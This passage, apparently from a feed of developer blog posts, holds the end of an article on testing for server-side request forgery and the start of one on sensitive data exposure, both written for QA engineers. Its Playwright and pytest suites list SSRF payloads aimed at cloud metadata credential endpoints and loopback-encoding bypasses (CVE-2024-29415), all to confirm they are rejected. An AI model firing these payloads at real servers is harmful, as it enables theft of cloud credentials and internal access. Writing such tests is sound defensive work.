403, 422] ... msg=Internal range not rejected: ${payload} END SSRF Valid External URL Still Works # confirm protection does not break legitimate requests Create Session app ${BASE_URL} ${response}= POST On Session app /api/fetch-url ... json={"url": "https://httpbin.org/get"} Should Be Equal As Strings ${response.status_code} 200 </code></pre> </div> <h3> TypeScript — Playwright API testing </h3> <div class="highlight js-code-highlight"> <pre class="highlight typescript"><code><span class="k">import</span> <span class="p">{</span> <span class="nx">test</span><span class="p">,</span> <span class="nx">expect</span><span class="p">,</span> <span class="nx">APIRequestContext</span> <span class="p">}</span> <span class="k">from</span> <span class="dl">'</span><span class="s1">@playwright/test</span><span class="dl">'</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">SSRF_PAYLOADS</span> <span class="o">=</span> <span class="p">{</span> <span class="na">cloudMetadata</span><span class="p">:</span> <span class="p">[</span> <span class="dl">'</span><span class="s1">http://169.254.169.254/latest/meta-data/</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">http://169.254.169.254/latest/meta-data/iam/security-credentials/</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">http://metadata.google.internal/computeMetadata/v1/</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">http://169.254.169.254/metadata/instance</span><span class="dl">'</span><span class="p">,</span> <span class="p">],</span> <span class="na">localhostVariants</span><span class="p">:</span> <span class="p">[</span> <span class="dl">'</span><span class="s1">http://127.0.0.1/</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">http://localhost/</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">http://0.0.0.0/</span><span class="dl">'</span><span class="p">,</span> <span class="p">],</span> <span class="c1">// CVE-2024-29415: non-standard representations bypass isPublic()</span> <span class="na">cve202429415Bypasses</span><span class="p">:</span> <span class="p">[</span> <span class="dl">'</span><span class="s1">http://127.1/</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">http://0x7f000001/</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">http://2130706433/</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">http://012.0.0.1/</span><span class="dl">'</span><span class="p">,</span> <span class="p">],</span> <span class="na">internalRanges</span><span class="p">:</span> <span class="p">[</span> <span class="dl">'</span><span class="s1">http://192.168.1.1/</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">http://10.0.0.1/</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">http://172.16.0.1/</span><span class="dl">'</span><span class="p">,</span> <span class="p">],</span> <span class="p">};</span> <span class="kd">const</span> <span class="nx">METADATA_MARKERS</span> <span class="o">=</span> <span class="p">[</span> <span class="dl">'</span><span class="s1">ami-id</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">instance-id</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">computeMetadata</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">access_key</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">secret_access_key</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">security-credentials</span><span class="dl">'</span><span class="p">,</span> <span class="p">];</span> <span class="kd">let</span> <span class="nx">apiContext</span><span class="p">:</span> <span class="nx">APIRequestContext</span><span class="p">;</span> <span class="nx">test</span><span class="p">.</span><span class="nf">beforeAll</span><span class="p">(</span><span class="k">async </span><span class="p">({</span> <span class="nx">playwright</span> <span class="p">})</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nx">apiContext</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">playwright</span><span class="p">.</span><span class="nx">request</span><span class="p">.</span><span class="nf">newContext</span><span class="p">({</span> <span class="na">baseURL</span><span class="p">:</span> <span class="dl">'</span><span class="s1">https://your-app.com</span><span class="dl">'</span><span class="p">,</span> <span class="p">});</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/login</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">username</span><span class="p">:</span> <span class="dl">'</span><span class="s1">testuser</span><span class="dl">'</span><span class="p">,</span> <span class="na">password</span><span class="p">:</span> <span class="dl">'</span><span class="s1">test_password</span><span class="dl">'</span> <span class="p">}</span> <span class="p">});</span> <span class="p">});</span> <span class="nx">test</span><span class="p">.</span><span class="nf">afterAll</span><span class="p">(</span><span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">dispose</span><span class="p">();</span> <span class="p">});</span> <span class="k">for </span><span class="p">(</span><span class="kd">const</span> <span class="nx">payload</span> <span class="k">of</span> <span class="nx">SSRF_PAYLOADS</span><span class="p">.</span><span class="nx">cloudMetadata</span><span class="p">)</span> <span class="p">{</span> <span class="nf">test</span><span class="p">(</span><span class="s2">`SSRF — cloud metadata rejected: </span><span class="p">${</span><span class="nx">payload</span><span class="p">}</span><span class="s2">`</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/fetch-url</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">url</span><span class="p">:</span> <span class="nx">payload</span> <span class="p">}</span> <span class="p">});</span> <span class="nf">expect</span><span class="p">(</span> <span class="p">[</span><span class="mi">400</span><span class="p">,</span> <span class="mi">403</span><span class="p">,</span> <span class="mi">422</span><span class="p">],</span> <span class="s2">`Cloud metadata payload not rejected: </span><span class="p">${</span><span class="nx">payload</span><span class="p">}</span><span class="s2">`</span> <span class="p">).</span><span class="nf">toContain</span><span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nf">status</span><span class="p">());</span> <span class="kd">const</span> <span class="nx">body</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">response</span><span class="p">.</span><span class="nf">text</span><span class="p">();</span> <span class="k">for </span><span class="p">(</span><span class="kd">const</span> <span class="nx">marker</span> <span class="k">of</span> <span class="nx">METADATA_MARKERS</span><span class="p">)</span> <span class="p">{</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">body</span><span class="p">,</span> <span class="s2">`Metadata marker '</span><span class="p">${</span><span class="nx">marker</span><span class="p">}</span><span class="s2">' found for: </span><span class="p">${</span><span class="nx">payload</span><span class="p">}</span><span class="s2">`</span><span class="p">)</span> <span class="p">.</span><span class="nx">not</span><span class="p">.</span><span class="nf">toContain</span><span class="p">(</span><span class="nx">marker</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> <span class="p">}</span> <span class="k">for </span><span class="p">(</span><span class="kd">const</span> <span class="nx">payload</span> <span class="k">of</span> <span class="nx">SSRF_PAYLOADS</span><span class="p">.</span><span class="nx">localhostVariants</span><span class="p">)</span> <span class="p">{</span> <span class="nf">test</span><span class="p">(</span><span class="s2">`SSRF — localhost variant rejected: </span><span class="p">${</span><span class="nx">payload</span><span class="p">}</span><span class="s2">`</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/fetch-url</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">url</span><span class="p">:</span> <span class="nx">payload</span> <span class="p">}</span> <span class="p">});</span> <span class="nf">expect</span><span class="p">(</span> <span class="p">[</span><span class="mi">400</span><span class="p">,</span> <span class="mi">403</span><span class="p">,</span> <span class="mi">422</span><span class="p">],</span> <span class="s2">`Localhost variant not rejected: </span><span class="p">${</span><span class="nx">payload</span><span class="p">}</span><span class="s2">`</span> <span class="p">).</span><span class="nf">toContain</span><span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nf">status</span><span class="p">());</span> <span class="p">});</span> <span class="p">}</span> <span class="k">for </span><span class="p">(</span><span class="kd">const</span> <span class="nx">payload</span> <span class="k">of</span> <span class="nx">SSRF_PAYLOADS</span><span class="p">.</span><span class="nx">cve202429415Bypasses</span><span class="p">)</span> <span class="p">{</span> <span class="nf">test</span><span class="p">(</span><span class="s2">`SSRF — CVE-2024-29415 bypass rejected: </span><span class="p">${</span><span class="nx">payload</span><span class="p">}</span><span class="s2">`</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// non-standard IP formats that bypass naive isPublic() checks</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/fetch-url</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">url</span><span class="p">:</span> <span class="nx">payload</span> <span class="p">}</span> <span class="p">});</span> <span class="nf">expect</span><span class="p">(</span> <span class="p">[</span><span class="mi">400</span><span class="p">,</span> <span class="mi">403</span><span class="p">,</span> <span class="mi">422</span><span class="p">],</span> <span class="s2">`CVE-2024-29415 bypass not blocked: </span><span class="p">${</span><span class="nx">payload</span><span class="p">}</span><span class="s2">`</span> <span class="p">).</span><span class="nf">toContain</span><span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nf">status</span><span class="p">());</span> <span class="p">});</span> <span class="p">}</span> <span class="k">for </span><span class="p">(</span><span class="kd">const</span> <span class="nx">payload</span> <span class="k">of</span> <span class="nx">SSRF_PAYLOADS</span><span class="p">.</span><span class="nx">internalRanges</span><span class="p">)</span> <span class="p">{</span> <span class="nf">test</span><span class="p">(</span><span class="s2">`SSRF — internal range rejected: </span><span class="p">${</span><span class="nx">payload</span><span class="p">}</span><span class="s2">`</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/fetch-url</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">url</span><span class="p">:</span> <span class="nx">payload</span> <span class="p">}</span> <span class="p">});</span> <span class="nf">expect</span><span class="p">(</span> <span class="p">[</span><span class="mi">400</span><span class="p">,</span> <span class="mi">403</span><span class="p">,</span> <span class="mi">422</span><span class="p">],</span> <span class="s2">`Internal range not rejected: </span><span class="p">${</span><span class="nx">payload</span><span class="p">}</span><span class="s2">`</span> <span class="p">).</span><span class="nf">toContain</span><span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nf">status</span><span class="p">());</span> <span class="p">});</span> <span class="p">}</span> <span class="nf">test</span><span class="p">(</span><span class="dl">'</span><span class="s1">SSRF — valid external URL still works</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// confirm SSRF protection does not break legitimate requests</span> <span class="kd">const</span> <span class="nx">response</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">apiContext</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/fetch-url</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">data</span><span class="p">:</span> <span class="p">{</span> <span class="na">url</span><span class="p">:</span> <span class="dl">'</span><span class="s1">https://httpbin.org/get</span><span class="dl">'</span> <span class="p">}</span> <span class="p">});</span> <span class="nf">expect</span><span class="p">(</span><span class="nx">response</span><span class="p">.</span><span class="nf">status</span><span class="p">()).</span><span class="nf">toBe</span><span class="p">(</span><span class="mi">200</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <p>Run SSRF tests in isolation:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="go">npx playwright test --grep "SSRF" </span></code></pre> </div> <h3> CI/CD gate </h3> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">ssrf-security-tests</span><span class="pi">:</span> <span class="na">stage</span><span class="pi">:</span> <span class="s">test</span> <span class="na">script</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">pytest tests/security/test_ssrf.py -v</span> <span class="pi">-</span> <span class="s">npx playwright test --grep "SSRF"</span> <span class="na">rules</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">if</span><span class="pi">:</span> <span class="s1">'</span><span class="s">$CI_PIPELINE_SOURCE</span><span class="nv"> </span><span class="s">==</span><span class="nv"> </span><span class="s">"merge_request_event"'</span> <span class="na">allow_failure</span><span class="pi">:</span> <span class="kc">false</span> </code></pre> </div> <p>Pair with a Semgrep rule that flags calls to <code>requests.get()</code>, <code>fetch()</code>, or <code>axios.get()</code> where the URL argument derives from user input without a preceding allowlist check. The static check catches new vulnerable patterns before they reach the test environment.</p> <h3> Environment note </h3> <p>SSRF behavior changes significantly between local development and cloud deployment. A test that passes locally because the development environment has no metadata service may completely miss that the same request succeeds in production against <code>http://169.254.169.254/</code>.</p> <p>Run your SSRF payload suite against an environment that mirrors the cloud infrastructure, ideally one where the metadata service is reachable so a successful bypass is caught as a test failure rather than silently passing.</p> <p>If you run on Kubernetes, also test against internal service DNS names resolvable from within the cluster, since SSRF in a Kubernetes environment can expose the API server and other cluster-internal services.</p> <h2> Why AI fails here </h2> <p>When a team asks GitHub Copilot to write tests for a URL-fetching endpoint, it writes tests that submit a valid external URL and assert that content is returned correctly. The SSRF protection layer is never exercised because the test inputs are exactly what the protection was never designed to intercept.</p> <p>The structural reason LLMs fail at SSRF: the vulnerability exists in the relationship between the feature and the infrastructure around it.<br> Testing for SSRF requires knowing that <code>http://169.254.169.254/</code> is significant, that <code>http://127.1/</code> resolves to loopback, and that a cloud server's network context gives it access to resources an internet client cannot reach. This context does not come from the code being tested. It comes from understanding the deployment environment, the cloud provider's architecture, and the history of SSRF bypass techniques.</p> <p>The concrete failure: a team builds a webhook delivery system that validates the destination URL before sending. They use <code>ip.isPublic()</code> as the guard. Copilot generates twelve tests. All pass. The tests submit valid external domains and assert they are accepted. The tests submit obvious private addresses like <code>http://192.168.1.1/</code> and assert they are rejected. Three months after release, a penetration tester submits <code>http://127.1/admin</code> as the webhook URL. <code>isPublic("127.1")</code> returns true. The server makes the request. The tester receives the internal admin panel response. The Copilot suite had zero tests for non-standard IP representations.</p> <h2> How to prevent </h2> <p><strong>1. Allowlist of permitted outbound destinations</strong> — define the specific external domains or IP ranges your application legitimately needs to reach in each feature and permit only those. Every other destination is rejected before any network request is made. An allowlist does not need to enumerate all possible attack representations. If the destination is not explicitly permitted, it is rejected by default.</p> <p><strong>2. Post-resolution IP validation</strong> — after resolving a user supplied hostname to its canonical IP address, check the resolved IP against forbidden ranges using a hardened library that handles all standard and non-standard representations. This catches DNS rebinding attacks because the check happens on the resolved IP, not the original hostname. It catches encoding bypass attacks because the resolved IP is always in standard dotted-decimal notation after resolution.</p> <p><strong>3. Network-level defense in depth</strong> — configure your deployment infrastructure so that application servers running user-facing features cannot reach the cloud metadata service, internal database ports, or Kubernetes API server even if application-level SSRF protection fails. On AWS, use IMDSv2 to prevent unauthenticated metadata retrieval. Apply security group rules that explicitly deny outbound connections from application servers to internal service ranges.</p> <p>Prevention only works when the SSRF payload suite verifies it under adversarial inputs, including the non-standard IP representations that bypass naive checks. A validation function that blocks <code>127.0.0.1</code> but allows <code>127.1</code> is not a validation function. The test suite is the only way to know the difference.</p> <h2> Conclusion </h2> <p>SSRF in those environments is not a theoretical finding. It is the vector that collapses the boundary between the public internet and internal control plane infrastructure.</p> <p>The consistent pattern across every system I have tested: developers did not fail to implement SSRF protection. They implemented it using blocklists, trusted library functions without testing edge cases, and never generated the adversarial payloads that would have revealed the gaps.</p> <p>Writing a test that submits <code>http://127.1/</code> takes thirty seconds. Not writing it costs you the metadata service.</p> <p>Part of the Break It on Purpose series, published weekly for QA<br> engineers and SDETs who find bugs before attackers do.</p> security testing python webdev Yuriy Safronnynov Mon, 20 Apr 2026 18:48:57 +0000 https://forem.com/ysafron/sensitive-data-exposure-the-bug-that-looks-like-a-feature-working-correctly-1djh https://forem.com/ysafron/sensitive-data-exposure-the-bug-that-looks-like-a-feature-working-correctly-1djh <p>The API response came back 200. The data was correct. The test passed.</p> <p>Nobody noticed the response body also contained the user's hashed <br> password, their internal account ID, a debug flag set to true, and a <br> field called <code>admin_notes</code> that was never meant to leave the server.</p> <p>Sensitive Data Exposure does not look like an attack. It looks like a <br> feature working correctly.</p> <h2> TL;DR </h2> <ul> <li>Sensitive Data Exposure happens when an application transmits, stores, or returns protected data without adequate controls. No exploit required. The data is simply available.</li> <li>CVE-2024-25124 in Gofiber Fiber allowed any origin to make credentialed requests due to a wildcard CORS misconfiguration. CVSS 9.4 Critical.</li> <li>Your suite checks that the right user gets the right data. It almost never checks what headers protect that data, what leaks in error responses, or what extra fields slip through the serializer.</li> <li>Three attack surfaces: data in transit (TLS, CORS headers), data at rest (logs, error messages), data in API responses (over-fetching, debug fields left in serializers).</li> <li>AI tools generate functional tests. They never generate a test that fails when a response contains a field it should not.</li> </ul> <h2> What it is </h2> <p>Sensitive Data Exposure covers a wide class of failures: data transmitted over unencrypted connections, credentials stored in plaintext, PII returned in API responses, stack traces sent to clients in error messages, secrets committed to logs, and configuration details exposed through misconfigured headers.</p> <p>The thread connecting all of them: the data should be protected and it is not.</p> <p>Developers introduce this in several ways, none of them malicious. A serializer that returns the full database model instead of a curated DTO. An error handler that forwards exception details to the client<br> for debugging convenience and never gets hardened before production. A CORS configuration set to permissive defaults during development and shipped as-is.</p> <p>In code review this is nearly impossible to spot without a specific checklist. The serializer returns data. The error handler returns a message. The CORS header is present. Everything looks like it is working.</p> <p>The question nobody asked: <strong>should this data actually be leaving the system in this form?</strong></p> <h2> Real world damage </h2> <p><strong>CVE-2024-25124 · Gofiber Fiber · February 2024 · CVSS 9.4 (Critical)</strong></p> <p>In February 2024, a critical vulnerability was disclosed in the CORS middleware of Gofiber Fiber, a widely used Go web framework. The flaw allowed developers to configure the middleware with a wildcard origin (<code>Access-Control-Allow-Origin: *</code>) while simultaneously enabling <code>Access-Control-Allow-Credentials: true</code>.</p> <p>This combination is explicitly prohibited by the CORS specification. It allows any website on the internet to make credentialed requests to the affected application and read the response. Sensitive user data, session tokens, and authenticated API responses could be accessed by attacker-controlled pages without the victim knowing.</p> <p>No credentials required from the attacker. No exploit chain. Just a misconfiguration the framework permitted and many developers shipped without realizing.</p> <blockquote> <p>Source: [GitHub Advisory GHSA-fmg4-x8pw-hjhg (<a href="https://github.com/advisories/GHSA-fmg4-x8pw-hjhg" rel="noopener noreferrer">https://github.com/advisories/GHSA-fmg4-x8pw-hjhg</a>) <br> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-25124" rel="noopener noreferrer">NVD CVE-2024-25124</a>. <br> Affected versions: Fiber prior to 2.52.1. Fixed in 2.52.1.</p> </blockquote> <p>A QA engineer running response header validation tests against any authenticated endpoint would have caught this. The test is not complex: send a credentialed cross-origin request, assert that <code>Access-Control-Allow-Origin</code> does not contain a wildcard. That test did not exist. The misconfiguration was in the framework default. Teams inherited it without knowing.</p> <h2> The invisible bug problem </h2> <p>Test suites validate that data is correct. Not that data is <strong>minimal</strong>.</p> <p>When you assert that <code>GET /users/123</code> returns the right name and email, you are not asserting that it does not also contain a password hash, an internal flag, or a field your serializer included because nobody removed it.</p> <p>Happy-path tests confirm the presence of expected data. Nobody writes a test that fails when <strong>unexpected</strong> data appears. That gap is where sensitive data exposure lives — entirely invisible to a suite that is otherwise fully green.</p> <p>Every response has two contracts:</p> <ol> <li>What it <strong>must</strong> contain</li> <li>What it <strong>must not</strong> contain</li> </ol> <p>Your suite almost certainly verifies the first. It needs to verify the second.</p> <h2> How QA engineers catch it </h2> <h3> PyTest </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="kn">import</span> <span class="n">pytest</span> <span class="kn">import</span> <span class="n">requests</span> <span class="kn">import</span> <span class="n">jsonschema</span> <span class="n">BASE_URL</span> <span class="o">=</span> <span class="sh">"</span><span class="s">https://your-app.com</span><span class="sh">"</span> <span class="n">FORBIDDEN_FIELDS</span> <span class="o">=</span> <span class="p">{</span> <span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">password_hash</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">token</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">secret</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">api_key</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">internal_id</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">debug</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">admin_notes</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">stack</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">trace</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">last_login_ip</span><span class="sh">"</span> <span class="p">}</span> <span class="n">ALLOWED_USER_FIELDS</span> <span class="o">=</span> <span class="p">{</span><span class="sh">"</span><span class="s">id</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">email</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">created_at</span><span class="sh">"</span><span class="p">}</span> <span class="nd">@pytest.fixture</span> <span class="k">def</span> <span class="nf">auth_session</span><span class="p">():</span> <span class="n">session</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="nc">Session</span><span class="p">()</span> <span class="n">session</span><span class="p">.</span><span class="nf">post</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/login</span><span class="sh">"</span><span class="p">,</span> <span class="n">json</span><span class="o">=</span><span class="p">{</span> <span class="sh">"</span><span class="s">username</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">testuser</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">password</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">test_password</span><span class="sh">"</span> <span class="p">})</span> <span class="k">return</span> <span class="n">session</span> <span class="k">def</span> <span class="nf">test_user_response_contains_no_forbidden_fields</span><span class="p">(</span><span class="n">auth_session</span><span class="p">):</span> <span class="c1"># CVE-2024-25124 pattern: assert what must NOT be in the response </span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/users/123</span><span class="sh">"</span><span class="p">)</span> <span class="n">body</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="nf">json</span><span class="p">()</span> <span class="n">exposed</span> <span class="o">=</span> <span class="n">FORBIDDEN_FIELDS</span><span class="p">.</span><span class="nf">intersection</span><span class="p">(</span><span class="n">body</span><span class="p">.</span><span class="nf">keys</span><span class="p">())</span> <span class="k">assert</span> <span class="ow">not</span> <span class="n">exposed</span><span class="p">,</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Sensitive fields exposed in response: </span><span class="si">{</span><span class="n">exposed</span><span class="si">}</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">test_user_response_schema_allowlist</span><span class="p">(</span><span class="n">auth_session</span><span class="p">):</span> <span class="c1"># any field outside the allowlist is a contract violation </span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/users/123</span><span class="sh">"</span><span class="p">)</span> <span class="n">body</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="nf">json</span><span class="p">()</span> <span class="n">unexpected</span> <span class="o">=</span> <span class="nf">set</span><span class="p">(</span><span class="n">body</span><span class="p">.</span><span class="nf">keys</span><span class="p">())</span> <span class="o">-</span> <span class="n">ALLOWED_USER_FIELDS</span> <span class="k">assert</span> <span class="ow">not</span> <span class="n">unexpected</span><span class="p">,</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Unexpected fields in response: </span><span class="si">{</span><span class="n">unexpected</span><span class="si">}</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">test_error_response_contains_no_stack_trace</span><span class="p">(</span><span class="n">auth_session</span><span class="p">):</span> <span class="c1"># deliberately trigger a server error </span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/users/invalid-id-trigger-500</span><span class="sh">"</span><span class="p">)</span> <span class="n">body</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">text</span> <span class="n">forbidden_strings</span> <span class="o">=</span> <span class="p">[</span><span class="sh">"</span><span class="s">Traceback</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">at line</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Exception</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">File </span><span class="se">\"</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">django</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">sqlalchemy</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">psycopg2</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">pymongo</span><span class="sh">"</span><span class="p">]</span> <span class="k">for</span> <span class="n">s</span> <span class="ow">in</span> <span class="n">forbidden_strings</span><span class="p">:</span> <span class="k">assert</span> <span class="n">s</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">body</span><span class="p">,</span> <span class="sa">f</span><span class="sh">"</span><span class="s">Stack trace marker </span><span class="sh">'</span><span class="si">{</span><span class="n">s</span><span class="si">}</span><span class="sh">'</span><span class="s"> found in error response</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">test_cors_no_wildcard_on_authenticated_endpoint</span><span class="p">(</span><span class="n">auth_session</span><span class="p">):</span> <span class="c1"># CVE-2024-25124: wildcard + credentials = any origin reads response </span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span> <span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/users/123</span><span class="sh">"</span><span class="p">,</span> <span class="n">headers</span><span class="o">=</span><span class="p">{</span><span class="sh">"</span><span class="s">Origin</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">https://attacker.com</span><span class="sh">"</span><span class="p">}</span> <span class="p">)</span> <span class="n">acao</span> <span class="o">=</span> <span class="n">response</span><span class="p">.</span><span class="n">headers</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">Access-Control-Allow-Origin</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="k">assert</span> <span class="n">acao</span> <span class="o">!=</span> <span class="sh">"</span><span class="s">*</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">Wildcard CORS on authenticated endpoint exposes data</span><span class="sh">"</span> <span class="k">def</span> <span class="nf">test_security_headers_present</span><span class="p">(</span><span class="n">auth_session</span><span class="p">):</span> <span class="n">response</span> <span class="o">=</span> <span class="n">auth_session</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="si">{</span><span class="n">BASE_URL</span><span class="si">}</span><span class="s">/users/123</span><span class="sh">"</span><span class="p">)</span> <span class="k">assert</span> <span class="sh">"</span><span class="s">X-Powered-By</span><span class="sh">"</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">response</span><span class="p">.</span><span class="n">headers</span><span class="p">,</span> \ <span class="sh">"</span><span class="s">X-Powered-By header discloses server technology</span><span class="sh">"</span> <span class="k">assert</span> <span class="n">response</span><span class="p">.</span><span class="n">headers</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">X-Content-Type-Options</span><span class="sh">"</span><span class="p">)</span> <span class="o">==</span> <span class="sh">"</span><span class="s">nosniff</span><span class="sh">"</span> <span class="k">assert</span> <span class="sh">"</span><span class="s">Secure</span><span class="sh">"</span> <span class="ow">in</span> <span class="n">response</span><span class="p">.</span><span class="n">headers</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">Set-Cookie</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">),</span> \ <span class="sh">"</span><span class="s">Session cookie missing Secure flag</span><span class="sh">"</span> <span class="k">assert</span> <span class="sh">"</span><span class="s">HttpOnly</span><span class="sh">"</span> <span class="ow">in</span> <span class="n">response</span><span 